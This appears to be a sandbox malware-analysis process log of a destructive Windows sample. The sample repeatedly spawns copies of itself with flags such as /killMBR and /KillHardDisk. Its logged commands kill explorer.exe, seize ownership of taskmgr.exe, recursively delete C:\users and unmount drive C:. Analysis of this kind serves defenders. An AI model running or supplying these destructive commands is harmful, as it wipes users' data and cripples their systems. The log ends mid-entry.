- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe+024005.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe
    3⤵
    PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe 1698005182
    3⤵
    PID:8848
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe 1698005182
      4⤵
      PID:7980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        5⤵
        
        PID:6024
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /protect 1698005182
1⤵
PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /protect 1698005182
1⤵
PID:4624
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /protect 1698005182
  2⤵
  - Executes dropped EXE
  PID:6148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe 1698005182
    3⤵
    PID:10100
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe 1698005182
      4⤵
      PID:5764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        5⤵
        
        PID:8660
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:7112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe+024005.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
    3⤵
    PID:9092

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
1⤵
- Executes dropped EXE
PID:6056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
  2⤵
  PID:8384
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
    3⤵
    PID:8720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:9224
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /autoup 1698005182
      4⤵
      PID:7920
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /autoup 1698005182
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killwindows 1698005182
      4⤵
      PID:10992
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killwindows 1698005182
        5⤵
        
        PID:12400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /KillHardDisk 1698005182
      4⤵
      PID:10748
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /KillHardDisk 1698005182
        5⤵
        
        PID:14756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killMBR 1698005182
      4⤵
      PID:9260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+08298.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
  2⤵
  PID:7440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
  2⤵
  PID:1848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:8256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+728290.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
  2⤵
  PID:3964

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe 1698005182
1⤵
- Executes dropped EXE
PID:5844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /save 1698005182
  2⤵
  PID:6260
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /save 1698005182
    3⤵
    - Executes dropped EXE
    PID:7136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:5052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:7816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /autoup 1698005182
  2⤵
  PID:8404
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /autoup 1698005182
    3⤵
    - Adds Run key to start application
    PID:2880
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:10148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /killwindows 1698005182
  2⤵
  PID:6884
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /killwindows 1698005182
    3⤵
    PID:7096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /KillHardDisk 1698005182
  2⤵
  PID:10924
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /KillHardDisk 1698005182
    3⤵
    PID:10248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:12944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol c: /d
      4⤵
      PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /killMBR 1698005182
  2⤵
  PID:12116
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /killMBR 1698005182
    3⤵
    PID:14944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /protect 1698005182
  2⤵
  PID:15632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /killwindows 1698005182
  2⤵
  PID:13344

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe 1698005182
1⤵
- Executes dropped EXE
PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /save 1698005182
  2⤵
  PID:6280
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /save 1698005182
    3⤵
    - Executes dropped EXE
    PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:6872
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:8588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /autoup 1698005182
  2⤵
  PID:7504
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /autoup 1698005182
    3⤵
    - Adds Run key to start application
    PID:7832
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /killwindows 1698005182
  2⤵
  PID:7364
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /killwindows 1698005182
    3⤵
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /KillHardDisk 1698005182
  2⤵
  PID:10552
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /KillHardDisk 1698005182
    3⤵
    PID:12064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:14628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /killMBR 1698005182
  2⤵
  PID:12688
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /killMBR 1698005182
    3⤵
    PID:11900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /protect 1698005182
  2⤵
  PID:15264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe /autoup 1698005182
  2⤵
  PID:16044

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
1⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+05747.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
1⤵
PID:6628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe+05747.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
1⤵
PID:6700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe+05747.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
1⤵
PID:6740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+05747.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
1⤵
PID:6768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe+05747.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe
1⤵
PID:6684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+727244.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
1⤵
PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe 1698005182
1⤵
PID:6728
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe 1698005182
  2⤵
  - Executes dropped EXE
  PID:7536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /autoup 1698005182
    3⤵
    PID:9952
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /autoup 1698005182
      4⤵
      PID:8568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killwindows 1698005182
    3⤵
    PID:9572
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killwindows 1698005182
      4⤵
      PID:6896
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        
        PID:11892
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        6⤵
        Modifies file permissions
        
        PID:14272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /KillHardDisk 1698005182
    3⤵
    PID:11676
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /KillHardDisk 1698005182
      4⤵
      PID:13464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        5⤵
        
        PID:15188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killMBR 1698005182
    3⤵
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killMBR 1698005182
      4⤵
      PID:13648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /autoup 1698005182
    3⤵
    PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe 1698005182
1⤵
PID:6632
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30590.exe 1698005182
  2⤵
  PID:5712
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
    3⤵
    PID:4708
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      PID:12504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:7200
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:8556

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
1⤵
- Executes dropped EXE
PID:7240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:7344
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:7548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
  2⤵
  PID:7816
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
    3⤵
    PID:6320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
  2⤵
  PID:6308
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
    3⤵
    PID:11244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:12036
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        Modifies file permissions
        
        PID:14264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
  2⤵
  PID:11980
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
    3⤵
    PID:11196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:16364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
  2⤵
  PID:14292
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
    3⤵
    PID:13168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
  2⤵
  PID:11820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+05225.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
1⤵
PID:7232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe 1698005182
1⤵
PID:6480
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe 1698005182
  2⤵
  PID:8500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /autoup 1698005182
    3⤵
    PID:8984
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /autoup 1698005182
      4⤵
      PID:6624
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:8592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /killwindows 1698005182
    3⤵
    PID:10560
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /killwindows 1698005182
      4⤵
      PID:11992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        
        PID:14248
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        6⤵
        Modifies file permissions
        
        PID:16380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /KillHardDisk 1698005182
    3⤵
    PID:12660
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /KillHardDisk 1698005182
      4⤵
      PID:12104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        5⤵
        
        PID:12348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /killMBR 1698005182
    3⤵
    PID:15196
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30550.exe /killMBR 1698005182
      4⤵
      PID:14292

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe 1698005182
1⤵
- Executes dropped EXE
PID:7352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:6304
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:8140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /autoup 1698005182
  2⤵
  PID:9492
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /autoup 1698005182
    3⤵
    PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /killwindows 1698005182
  2⤵
  PID:3772
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /killwindows 1698005182
    3⤵
    PID:6648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:5524
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        Modifies file permissions
        
        PID:8276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /KillHardDisk 1698005182
  2⤵
  PID:11764
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
